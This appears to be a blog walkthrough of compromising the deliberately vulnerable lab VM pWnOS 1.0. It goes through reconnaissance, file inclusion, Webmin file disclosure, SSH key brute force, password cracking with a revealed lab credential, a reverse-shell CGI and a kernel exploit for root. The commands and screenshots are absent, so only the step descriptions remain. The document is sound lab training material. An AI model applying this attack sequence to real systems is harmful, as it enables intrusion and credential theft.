Tuesday, December 11, 2018

pWnOS 1.0


- Layout for this exercise:


- The goal of this exercise is to develop a hacking process for the vulnerable machine pWnOS 1.0

pWnOS 1.0 can be downloaded from here:,33/

- Once downloaded pWnOS 1.0 and extracted with VMware:


- Discovering the IP of pWnOS 1.0:

- Scanning ports with Nmap:

- Launching Nikto against the web server at port 80:

- Going to folder /php, detected by nikto:

- Clicking phpMyAdmin:

- Now, launching dirb:

- Connecting to folder /index:

- Clicking Next:

- Clicking Please Help!:


- There are several ways of exploitation for this vulnerable machine. Let's study some of them:

3.1 - File Inclusion

Going back to index1.php when entering false instead of true there is a Warning message about function include():

- This leads to think about a possible File Inclusion vulnerability, what actually helps to achieve the file /etc/passwd:

3.2 - Webmin exploitation

- Going back to port 10000, according to Nmap's output Webmin is running with MiniServ 0.01:

- Looking for Webmin exploits:

- Copyng to the local working directory:

- Running without parameters:

- Getting /etc/passwd:

- Getting /etc/shadow:

3.3 - PRNG Brute Force SSH

- Same exploit than at 3.2 can be used again, in combination with these two other exploits (either Perl or Python):

- According to the instructions, first we must download the exploit and store it:

- Extracting, we find the precalculated SSH keys:


- Going ahead with the instructions (in our case we are using a Perl script, instead of Python):

- Using the script from point 3.2 with user obama (obviously same thing could be done with the rest of the users vmware, osama and yosama) to get the file authorized_keys:

- Scan the public key by grepping authorized_keys from obama user to folder /rsa/2048:

- The SSH key for user obama is found:

- SSH-ing for user obama, providing the key, we achieve a low privileged remote shell:

3.3 - File disclosure with Metasploit

- CVE-2006-3392 describes a vulnerability associated with Webmin:

Metasploit is able to exploit the vulnerability CVE-2006-3392:

- Launching Metasploit and using exploit auxiliary/admin/webmin/file_disclosure:

- Setting option for RHOST:

- Setting option for /etc/passwd and running:

- Setting option for /etc/shadow and running:

3.4 - Path / Directory traversal attack

- Following instructions from the CVE-2006-3392 vulnerability description about using "..%01" sequences, we can also achieve /etc/passwd and /etc/shadow by launching a Path or Directory traversal attack:

- Path traversal attack for /etc/passwd:

- Path traversal attack for /etc/shadow:


- John The Ripper helps us to decrypt passwords by combining /etc/passwd and /etc/shadow:

- First, let's store /etc/passwd at file p and /etc/shadow at file s.

- Now, unshadow command takes p and s and outputs unshadowed file u:

- It is time for john to work over file u, applying the wordlist rockyou.txt

- After some minutes we got the password for user wmware.

- SSH-ing with credentials vmware:h4ckm3 we get a low privilege remote shell:

- Unfortunately user vmware has no sudoer privilege:


- Let's follow to ways for Privilege Escalation.

5.1 - Webshell

Copying to the local working folder a Perl reverse shell:

- Renaming to shell.cgi sot that it can be run as CGI script:

- Adapting to our needs shell.cgi:

- Transferring from Kali to pWnOS 1.0 (folder /tmp):

- Copying from /tmp to /home/vmware:

- Setting run permissions for shell.cgi:

- Setting a Netcat listener at Kali:

- Running shell.cgi:

- As a consequence we get a root privilege shell:

5.2 - Kernel exploit

- Another way of Privilege Escalation would be taking advantage of the outdated kernel version:

- Exploit Database holds exploits for Local Privilege Escalation about outdated Linux Kernel version, for instance this one would be valid because 2.6.17 < 2.6.22 <

- Downloading to working folder and naming vmsplice.c:

- Setting execution permissions:

- Transferring from Kali to pWnOS 1.0 (/tmp folder):

- Compiling:

- Running the exploit, it is successful: